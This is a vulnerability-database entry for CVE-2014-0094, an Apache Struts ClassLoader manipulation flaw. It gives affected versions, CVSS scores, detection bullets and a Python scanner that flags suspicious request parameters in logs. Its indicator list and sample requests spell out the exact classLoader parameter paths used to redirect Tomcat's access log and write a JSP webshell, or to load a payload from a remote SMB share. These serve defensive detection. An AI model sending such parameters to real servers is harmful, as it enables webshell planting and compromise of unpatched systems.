cbcvebase.
CVE-2014-0094
published 2014-03-11


Priority: P276, medium, 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 99.61% (99.9th percentile)
The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.

Affected

2 ranges

Vendor | Product | Version range | Fixed in
apache | struts | >= 2.0.0 < 2.3.16.2 | 2.3.16.2
apache | struts | >= 2.0.0 < 2.3.16.1 | 2.3.16.1

Detection & IOCs (extracted from sources)

url: /struts2-blank/example/HelloWorld.action
port: 8080
command: class['classLoader'].resources.context.parent.pipeline.first.directory
command: class['classLoader'].resources.context.parent.pipeline.first.prefix
command: class['classLoader'].resources.context.parent.pipeline.first.suffix
command: class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat
command: class.classLoader.resources.context.parent.pipeline.first.directory
command: class['classLoader'].resources.dirContext.docBase
path: webapps/ROOT
  • Detect HTTP GET requests whose query strings contain ClassLoader manipulation parameters beginning with 'class[' or 'class.classLoader', particularly those ending in the pipeline configuration sub-keys (directory, prefix, suffix, fileDateFormat).
  • For Struts 1.x exploitation, look for the parameter name pattern 'class.classLoader' in HTTP requests; for Struts 2.x, look for 'class['classLoader']'. Both are used to reach getClass() and manipulate the ClassLoader.
  • The exploit writes a JSP webshell to 'webapps/ROOT' by redirecting Tomcat's access log via ClassLoader manipulation; monitor for unexpected .jsp files appearing in the web root shortly after suspicious GET requests.
  • For the Windows/SMB variant, detect GET requests containing 'class['classLoader'].resources.dirContext.docBase' pointing to a UNC path (\\host\share), which indicates an attempt to load a remote SMB-hosted payload.
  • The vulnerability is in ParametersInterceptor (Struts 2.x) and ActionForm bean population (Struts 1.x); both allow the 'class' parameter to be passed to getClass(), enabling ClassLoader manipulation via crafted HTTP request parameters.
  • The Struts 1.x attack vector uses dot notation ('class.classLoader') while Struts 2.x uses bracket notation ('class['classLoader']'). Detection rules must cover both syntactic forms to avoid blind spots.
  • CVE-2014-0094 affects Apache Struts 2.x before 2.3.16.2; CVE-2014-0112 is an incomplete-fix bypass affecting Struts before 2.3.20. Detections should account for both vulnerability variants, as they share the same exploitation technique.
  • A related variant (CVE-2014-0113) exploits the same ClassLoader manipulation via CookieInterceptor when a wildcard cookiesName value is used, so cookie-header-based detection is required in addition to query-parameter detection.
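
The following log-triage helper is an added example, not part of this entry's sources or of any Struts tooling. It implements the parameter-name checks from the bullets above: both notations, percent-encoded forms, the Cookie header, and a UNC-valued docBase. The sample requests, the `/app/login.do` path, `host.example`, and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# 'class' reaching classLoader in dot form (class.classLoader) or bracket form
# (class['classLoader']), followed by the rest of the property path.
KEY = re.compile(
    r"""\bclass(?P<sep>\.|\[\s*['"])classLoader(?:['"]\s*\])?(?P<path>[\w.\[\]'"]*)""",
    re.IGNORECASE,
)

# Constructed samples: (request target, Cookie header). Values are placeholders.
SAMPLES = [
    ("/struts2-blank/example/HelloWorld.action?name=test", ""),
    ("/struts2-blank/example/HelloWorld.action?class%5B%27classLoader%27%5D"
     ".resources.context.parent.pipeline.first.suffix=x", ""),
    ("/app/login.do?class.classLoader.resources.context.parent.pipeline"
     ".first.directory=x", ""),
    ("/struts2-blank/example/HelloWorld.action",
     "JSESSIONID=constructed; class['classLoader'].resources.context.parent"
     ".pipeline.first.prefix=x"),
    ("/struts2-blank/example/HelloWorld.action?class%5B%27classLoader%27%5D"
     ".resources.dirContext.docBase=%5C%5Chost.example%5Cshare", ""),
]

def decode(value, rounds=2):
    # Undo up to two layers of percent-encoding so encoded brackets and
    # quotes (%5B%27, or double-encoded %255B%2527) are normalised first.
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def scan(request_target, cookie_header=""):
    """Return one finding per classLoader parameter name in query or cookie."""
    findings = []
    query = request_target.partition("?")[2]
    for source, raw in (("query", query), ("cookie", cookie_header)):
        text = decode(raw)
        for m in KEY.finditer(text):
            findings.append({
                "source": source,
                "notation": "dot" if m.group("sep") == "." else "bracket",
                "sub_key": m.group("path").rsplit(".", 1)[-1].strip("[]'\""),
                # True when the value begins with two backslashes (UNC path).
                "unc_value": text.startswith("=\\\\", m.end()),
            })
    return findings

if __name__ == "__main__":
    for target, cookie in SAMPLES:
        print(target[:50], scan(target, cookie))
```

The request target and Cookie header would normally come from access-log or proxy-log fields; POST bodies are not covered by this sketch.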

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N
ghsa | | 5.0 | MEDIUM |
osv | | 5.0 | MEDIUM |
vulncheck | | 5.0 | MEDIUM |
vendor_redhat | | 5.0 | MEDIUM |